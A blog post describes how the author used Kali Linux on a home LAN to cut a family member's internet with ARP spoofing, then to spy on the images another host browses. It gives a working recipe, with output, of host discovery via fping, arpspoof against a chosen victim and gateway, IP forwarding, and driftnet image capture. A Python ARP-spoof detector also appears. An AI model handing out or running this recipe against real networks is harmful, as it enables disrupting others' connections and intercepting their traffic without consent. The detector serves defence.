Small LAN operations with Kali

Recently, my father has always been watching TV dramas on the front page (no money, no advertisements, nothing to do during the epidemic), but he usually goes back to a little more at night, which is not good for his health. My mother said that my father went to bed too late and wanted him to go to bed earlier, but he didn't listen. So I used Kali to cut off the Internet. The following information is for learning only.

1. Cutting off network access with ARP

1.1 Tools required

  • A virtual machine (network set to bridged mode) running the Kali operating system
  • fping, similar to ping on Windows; it helps us find the live IPs on the LAN.

1.2 Specific operation

  1. ifconfig => used to view our IP
root@kali:~# ifconfig
eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.1.101  netmask 255.255.255.0  broadcast 192.168.1.255
        inet6 fe80::20c:29ff:fe69:929a  prefixlen 64  scopeid 0x20<link>
        ether 00:0c:29:69:92:9a  txqueuelen 1000  (Ethernet)
        RX packets 1635316  bytes 226317367 (215.8 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 141839  bytes 141216587 (134.6 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 1996  bytes 222108 (216.9 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 1996  bytes 222108 (216.9 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

If you have wlan0, you can use wlan0.

  2. ip route show => shows our gateway

root@kali:~# ip route show
default via 192.168.1.1 dev eth0 proto dhcp metric 100 
192.168.1.0/24 dev eth0 proto kernel scope link src 192.168.1.101 metric 100 
  3. Look at the live IPs on the LAN. The command is fping -asg 192.168.1.0/24
root@kali:~# fping -asg 192.168.1.0/24
192.168.1.1
192.168.1.101
192.168.1.107
192.168.1.103
192.168.1.102
192.168.1.109
192.168.1.104

There is still a pile of IPs that I will not write out; basically, those are not live IPs. Here, I am 192.168.1.103.

  4. ARP spoofing. The command is very simple; here I test against my own IP
root@kali:~# arpspoof -i eth0 -t 192.168.1.103 192.168.1.1
0:c:29:69:92:9a 70:3a:51:4:dc:82 0806 42: arp reply 192.168.1.1 is-at 0:c:29:69:92:9a
0:c:29:69:92:9a 70:3a:51:4:dc:82 0806 42: arp reply 192.168.1.1 is-at 0:c:29:69:92:9a
0:c:29:69:92:9a 70:3a:51:4:dc:82 0806 42: arp reply 192.168.1.1 is-at 0:c:29:69:92:9a
0:c:29:69:92:9a 70:3a:51:4:dc:82 0806 42: arp reply 192.168.1.1 is-at 0:c:29:69:92:9a
0:c:29:69:92:9a 70:3a:51:4:dc:82 0806 42: arp reply 192.168.1.1 is-at 0:c:29:69:92:9a
0:c:29:69:92:9a 70:3a:51:4:dc:82 0806 42: arp reply 192.168.1.1 is-at 0:c:29:69:92:9a
0:c:29:69:92:9a 70:3a:51:4:dc:82 0806 42: arp reply 192.168.1.1 is-at 0:c:29:69:92:9a
0:c:29:69:92:9a 70:3a:51:4:dc:82 0806 42: arp reply 192.168.1.1 is-at 0:c:29:69:92:9a
0:c:29:69:92:9a 70:3a:51:4:dc:82 0806 42: arp reply 192.168.1.1 is-at 0:c:29:69:92:9a

About the command format:
This command performs ARP spoofing. It tells the victim that the gateway's IP is at my network card's MAC address (the arp reply lines above), so the packets the victim sends to the gateway come to my network card instead. The -i parameter selects the local eth0 network card. After -t, the first IP is the victim IP and the second is the gateway IP. Now I can't refresh Today's Headlines. But if others send you a WeChat message, you can still receive it.
After updating Kali yesterday, I found that there was no arpspoof command. You can install it yourself and read someone else's readme.md on GitHub. There are detailed commands in it.
Use Ctrl+Z to stop spoofing.
In fact, I've finished writing here. But I think that since arpspoof is used, I have to mention driftnet.
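
From the defender's side, the spoof shown above is visible in the victim's neighbour table: the gateway IP resolves to the MAC of another LAN host. The following Python check is an added example, not part of the original post; it parses the output format of ip neigh show, uses the addresses from this page, and assumes a gateway MAC (02:00:00:00:00:01) and sample tables that are constructed.

```python
import re

# One IPv4 line of "ip neigh show": <ip> dev <if> lladdr <mac> <state>
NEIGH_RE = re.compile(r"^(\d+(?:\.\d+){3}) dev \S+ lladdr ([0-9A-Fa-f:]+) \S+")

GATEWAY_IP = "192.168.1.1"          # gateway from "ip route show" on this page
GATEWAY_MAC = "02:00:00:00:00:01"   # constructed baseline, not from the page

# Constructed neighbour table of 192.168.1.103 before the spoof ...
CLEAN = """\
192.168.1.1 dev eth0 lladdr 02:00:00:00:00:01 REACHABLE
192.168.1.101 dev eth0 lladdr 00:0c:29:69:92:9a STALE
192.168.1.102 dev eth0 FAILED
"""
# ... and while the arp reply lines shown on this page are arriving.
POISONED = CLEAN.replace("192.168.1.1 dev eth0 lladdr 02:00:00:00:00:01",
                         "192.168.1.1 dev eth0 lladdr 00:0c:29:69:92:9a")


def normalize_mac(mac):
    """Zero-pad octets so arpspoof's 0:c:29:... equals 00:0c:29:..."""
    return ":".join(octet.zfill(2) for octet in mac.lower().split(":"))


def parse_neigh(text):
    """Return {ip: mac} for entries that carry a link-layer address."""
    table = {}
    for line in text.splitlines():
        m = NEIGH_RE.match(line.strip())
        if m:
            table[m.group(1)] = normalize_mac(m.group(2))
    return table


def find_spoofing(table, gateway_ip, baseline_mac):
    """Return findings that indicate the gateway entry has been poisoned."""
    findings = []
    gw_mac = table.get(gateway_ip)
    if gw_mac and gw_mac != normalize_mac(baseline_mac):
        findings.append(("gateway-mac-changed", gateway_ip, gw_mac))
    # A MAC that answers for the gateway and for another host is the spoofer;
    # this only fires if the spoofer's own IP is also in the cache.
    sharing = sorted(ip for ip, mac in table.items()
                     if mac == gw_mac and ip != gateway_ip)
    if gw_mac and sharing:
        findings.append(("mac-shared-with-gateway", gw_mac, sharing))
    return findings


if __name__ == "__main__":
    for name, text in (("clean", CLEAN), ("poisoned", POISONED)):
        print(name, find_spoofing(parse_neigh(text), GATEWAY_IP, GATEWAY_MAC))
```

The baseline MAC has to be recorded while the network is known to be good; the check is then run against the real ip neigh show output of the host being examined.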

2. Viewing the pictures a specific LAN IP is browsing

Following on from the mention of driftnet above, I will use it to show the operation.
Enter driftnet in the terminal to see whether the tool is present. If it is missing or the command is not found, go to GitHub to find the installation tutorial. Here is the GitHub address: Read readme.md

  1. In the terminal, enter echo 1 > /proc/sys/net/ipv4/ip_forward to enable IP forwarding, so that the spoofed IP can still access the Internet normally; that is, change the 0 in the file to 1
root@kali:~# echo 1 > /proc/sys/net/ipv4/ip_forward
root@kali:~# 
  2. Start spoofing (with my own IP)
arpspoof -i eth0 -t 192.168.1.1 192.168.1.103

-i specifies the network card; -t specifies the gateway first, and then the attacked IP.
The following is the start of the output:

root@kali:~# arpspoof -i eth0 -t 192.168.1.103 192.168.1.1
0:c:29:69:92:9a 70:3a:51:4:dc:82 0806 42: arp reply 192.168.1.1 is-at 0:c:29:69:92:9a
0:c:29:69:92:9a 70:3a:51:4:dc:82 0806 42: arp reply 192.168.1.1 is-at 0:c:29:69:92:9a

Then run:

driftnet -i eth0

Here I use Today's Headlines to search for pictures of Kobe. If nothing goes wrong with driftnet, the following will appear (I will upload the pictures directly):

Afterwards the pictures are saved to the home directory.
Record the current time:

In [1]: from datetime import datetime                                           

In [2]: print(datetime.now())                                                   
2020-02-16 14:47:59.696041

In [3]: 

Tags: network github

Posted on Sun, 16 Feb 2020 02:35:44 -0500 by theqase